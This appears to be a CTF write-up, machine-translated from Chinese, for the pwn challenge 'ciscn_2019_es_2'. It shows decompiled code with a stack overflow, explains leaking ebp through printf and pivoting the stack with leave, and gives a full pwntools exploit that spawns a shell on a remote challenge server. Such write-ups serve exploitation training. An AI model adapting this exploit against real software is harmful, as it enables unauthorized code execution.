【CTF】ciscn_ 2019_ es_ two

Their thinking

Decompile

undefined4 main(void)
{
    
  EVP_PKEY_CTX *in_stack_fffffff0;
  
  init(in_stack_fffffff0);
  puts("Welcome, my friend. What\'s your name?");
  vul();
  return 0;
}

void vul(void)
{
    
  undefined local_2c [40];
  memset(local_2c,0,0x20);
  read(0,local_2c,0x30);
  printf("Hello, %s\n",local_2c);
  read(0,local_2c,0x30);
  printf("Hello, %s\n",local_2c);
  return;
}

void hack(void)
{
    
  system("echo flag");
  return;
}

Judging from the decompilation results , The loopholes are still very clear ,vul Medium read The function provides an overflow point ,hack Function provides system Function call .

difficulty & Ideas

The first is the overflow point , From the local variable size and read length limit , Can overflow , But the length is not long , After testing , Overflow point at 44 Byte , in other words , You can only set one 4 Byte return address .

undefined local_2c [40];
read(0,local_2c,0x30);

Then there hack function ,system Parameters of need to be constructed , But from the above one, we can see , Ordinary overflow cannot construct more parameters .
therefore , The difficulty is how to extend the overflow length ？
From the perspective of assembly and decompile code , There is no effective way , But there is one doubtful point ： The return address is preceded by ebp Address , If the overflow can only be overwritten to the return address , Then another thing that can affect is ebp, Whether it can be controlled ebp To control the next execution ？
After repeated debugging found that , The return address is leave Will reduce the stack address , Jump to the local variable range , Then you can go through read Function input required parameter information .
then , The last question left is ,ebp How to set the address of ？
vul Two times read and printf It is worth analyzing , From the previous analysis ,read The length limit is only more than local variables 8 Bytes , this 8 Bytes is ebp And function return address , and printf Print in string format , Then fill all local variables with non 0 byte , You can print out the back 8 Bytes of content .（ If 8 There are... In bytes 0x00, There will indeed be stage problems ）, not so bad , After testing , This method is effective .

Problem solving script

from pwn import *

context(arch = 'amd64', os = 'linux',log_level = 'debug', terminal="/bin/sh")
#sh = process('./ciscn_2019_es_2')
sh = remote('node4.buuoj.cn',28365)
vuln_addr = 0x08048625
system_plt = 0x08048400
vuln_leave_addr = 0x080485fd

sh.recvline()
pad = '0'*39
sh.sendline(pad.encode())
text = sh.recvline()
text += sh.recvline()
addr_s = text[47:51]
ebp_addr = int.from_bytes(addr_s, 'little')
print("addr:%#x" % ebp_addr)

#ebp_addr = 0xffffd2c8
#exp = 'sh'.encode() + p8(0) + p8(0) + p32(0) + p32(0) + p32(system_plt) + p32(vuln_addr) + p32(ebp_addr - 0x38) + p32(0)
exp = p32(system_plt) + p32(vuln_addr) + p32(ebp_addr - 0x38 + 12) + 'sh'.encode() + p16(0)
payload = exp + ('2'*24).encode() + p32(ebp_addr - 0x3c) +  p32(vuln_leave_addr)
sh.send(payload)
sh.recvline()

with open('payload.txt', 'wb') as f:
    f.write(('0'*47).encode() + '\n'.encode())
    f.write(payload)

sh.interactive()

summary

Same as before , In fact, this idea came to mind relatively quickly , But how to use the card ebp Come on, jump on , It took a lot of time , little does one think leave It will also reduce the stack address , Among them ebp_addr-0x3c Through experiments, it is concluded that ; Another is when doing this problem , When experimenting on this machine ,system Can't wait, As a result, the investigation took a lot of time , Who knows, the target just dripped , No problem , No tears to cry ...